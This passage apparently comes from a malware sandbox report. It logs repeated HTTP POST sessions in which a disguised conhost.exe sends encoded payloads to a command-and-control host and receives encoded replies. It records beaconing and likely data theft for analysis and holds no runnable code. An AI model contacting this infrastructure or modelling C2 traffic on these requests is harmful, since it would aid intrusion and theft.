                                                          Data Ascii: XSZ\YHTP\XWZT]UQYQYWPZVF[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT",#!8<_*'..Y&'X/8%.82&49+"T+!F/'P,1
                                                          Oct 1, 2024 05:57:33.787744045 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.64970737.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:32.349009991 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:57:32.748456955 CEST1120OUTData Raw: 58 57 5a 5b 59 42 51 55 5c 58 57 5a 54 52 55 5e 59 51 59 57 50 5c 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XWZ[YBQU\XWZTRU^YQYWP\VH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!^-,"8>"-Z0)&^4,(0-(&W9%$>2,(!F/'P,
                                                          Oct 1, 2024 05:57:32.954940081 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:33.085501909 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.64970837.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:33.947521925 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:57:34.294306993 CEST1120OUTData Raw: 58 56 5a 5c 5c 43 54 51 5c 58 57 5a 54 59 55 5d 59 54 59 58 50 5f 56 40 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XVZ\\CTQ\XWZTYU]YTYXP_V@[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!Y-6;Z)T)\318X, 80-$W$191+<9!F/'P,!
                                                          Oct 1, 2024 05:57:34.554532051 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:34.681365013 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:34 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.64970937.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:34.968970060 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:35.326045036 CEST1120OUTData Raw: 5d 51 5a 5b 5c 43 51 56 5c 58 57 5a 54 58 55 50 59 5b 59 58 50 5e 56 46 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]QZ[\CQV\XWZTXUPY[YXP^VF[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!X,3,6]4\=6&>6X&/ %=<$1Q%4>!$T?9!F/'P,%
                                                          Oct 1, 2024 05:57:35.599522114 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:35.725059986 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:35 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.64971237.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:35.978929043 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:36.325001001 CEST1120OUTData Raw: 58 57 5f 54 59 43 51 52 5c 58 57 5a 54 52 55 5f 59 55 59 59 50 50 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XW_TYCQR\XWZTRU_YUYYPPVA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!^-R";4=2.0%1+(;<$X %%&79(T#<9!F/'P,
                                                          Oct 1, 2024 05:57:36.593805075 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:36.727087021 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:36 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.64971437.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:38.302146912 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1840
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:38.652755976 CEST1840OUTData Raw: 58 5d 5a 5e 59 49 54 5f 5c 58 57 5a 54 52 55 5d 59 55 59 58 50 5d 56 46 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: X]Z^YIT_\XWZTRU]YUYXP]VF[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!\.3T (;)=3>=%((8('+1191]>" +!F/'P,
                                                          Oct 1, 2024 05:57:38.905919075 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:39.032681942 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:38 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 25 59 27 0a 21 0d 21 12 29 59 3d 3c 20 04 30 0e 20 05 39 04 3c 06 27 3c 3f 5e 2e 1c 2a 11 3c 07 26 1f 26 07 2c 04 32 0b 2e 10 27 26 20 5f 0d 10 22 59 35 38 2d 09 2c 29 0d 5e 2a 21 0d 1a 25 33 3f 11 33 33 04 1b 2b 07 34 1c 27 12 3e 0b 30 12 35 0c 2c 43 24 58 2a 37 24 52 20 3b 2d 56 02 1e 21 09 32 38 3a 09 23 01 13 59 25 38 3b 04 21 06 26 0e 3d 3e 0d 03 24 0a 26 14 3e 3d 27 1e 3f 3f 28 03 35 03 39 14 23 57 21 57 27 33 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: %Y'!!)Y=< 0 9<'<?^.*<&&,2.'& _"Y58-,)^*!%3?33+4'>05,C$X*7$R ;-V!28:#Y%8;!&=>$&>='??(59#W!W'3'\ -Q4ZP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.64971537.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:42.002616882 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:42.356487036 CEST1120OUTData Raw: 58 54 5f 59 59 49 51 53 5c 58 57 5a 54 59 55 5c 59 5b 59 5c 50 5d 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XT_YYIQS\XWZTYU\Y[Y\P]VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"9#+R">2$%%',U'$.<Q1"=1\??*)!F/'P,!
                                                          Oct 1, 2024 05:57:42.626559019 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:42.761073112 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:42 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.64971637.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:43.070566893 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:43.419334888 CEST1120OUTData Raw: 5d 55 5a 59 59 48 54 5f 5c 58 57 5a 54 5e 55 5f 59 57 59 59 50 51 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]UZYYHT_\XWZT^U_YWYYPQVC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!- 5(;)2'=6&+;,3#W%.S$12$4>\?"$S<!F/'P,=
                                                          Oct 1, 2024 05:57:43.672549963 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:43.805306911 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:43 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.64971737.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:44.049694061 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1840
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:44.402856112 CEST1840OUTData Raw: 58 56 5f 5e 5c 46 54 51 5c 58 57 5a 54 5d 55 58 59 51 59 5f 50 5b 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XV_^\FTQ\XWZT]UXYQY_P[VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!_:0#R!+([=!&'*&/0?S3=+$!*&4?1#?)!F/'P,1
                                                          Oct 1, 2024 05:57:44.683520079 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:44.818905115 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 26 00 30 24 03 0d 21 2f 3d 58 2a 11 27 58 30 27 09 19 2d 3e 28 08 26 3f 34 02 2e 54 31 05 2b 3a 36 12 25 2d 28 04 25 31 2d 0e 27 26 20 5f 0d 10 22 13 21 28 2e 1c 3b 17 24 01 3d 57 2c 07 32 09 3f 11 30 33 32 1b 3f 2e 3c 1f 30 5a 29 1e 27 5a 36 57 2f 0b 2f 00 3d 09 28 1f 34 01 2d 56 02 1e 22 56 25 28 21 51 20 11 32 01 25 28 20 5e 21 16 31 1d 3d 00 23 03 30 24 3a 5c 3e 2d 0a 04 3f 3c 2c 02 23 2a 04 06 34 31 0f 57 27 33 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: &0$!/=X*'X0'->(&?4.T1+:6%-(%1-'& _"!(.;$=W,2?032?.<0Z)'Z6W//=(4-V"V%(!Q 2%( ^!1=#0$:\>-?<,#*41W'3'\ -Q4ZP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.64971837.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:44.132702112 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:44.480855942 CEST1120OUTData Raw: 5d 52 5f 54 5c 44 54 51 5c 58 57 5a 54 52 55 5e 59 57 59 59 50 58 56 44 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]R_T\DTQ\XWZTRU^YWYYPXVD[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!:07T";>*3-&;?X,83>(R$"-14&?;<!F/'P,
                                                          Oct 1, 2024 05:57:44.757843018 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:44.928672075 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.64971937.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:45.569349051 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:57:45.918323040 CEST1120OUTData Raw: 58 57 5a 5f 5c 44 54 50 5c 58 57 5a 54 53 55 58 59 56 59 56 50 51 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XWZ_\DTP\XWZTSUXYVYVPQVG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT".#4 ++)25]&.%&88#?V'>,V2W&4?$U?)!F/'P,
                                                          Oct 1, 2024 05:57:46.194348097 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:46.329195023 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:46 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.64972137.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:46.603688955 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:46.949543953 CEST1120OUTData Raw: 58 50 5a 58 59 47 54 55 5c 58 57 5a 54 58 55 58 59 5b 59 5f 50 5b 56 46 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XPZXYGTU\XWZTXUXY[Y_P[VF[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-#T6 ?2!05&+\;34Q&1>&<$V(!F/'P,%
                                                          Oct 1, 2024 05:57:47.237483025 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:47.409883976 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:47 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.64972337.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:48.106285095 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:48.465204000 CEST1120OUTData Raw: 58 53 5f 5e 59 49 51 53 5c 58 57 5a 54 52 55 59 59 54 59 59 50 58 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XS_^YIQS\XWZTRUYYTYYPXVH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!]:0(!;+>"3=>%;,?W' V21>T&'&^<$R*9!F/'P,
                                                          Oct 1, 2024 05:57:48.726643085 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:48.858896017 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.64972437.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:48.982975006 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1112
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:49.340172052 CEST1112OUTData Raw: 58 51 5a 5e 59 45 51 56 5c 58 57 5a 54 5b 55 5d 59 56 59 5c 50 5e 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XQZ^YEQV\XWZT[U]YVY\P^VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"90?W!+>.$>&^&8+Y-3$,S2!&%>"8V+!F/'P,9
                                                          Oct 1, 2024 05:57:49.588702917 CEST25INHTTP/1.1 100 Continue
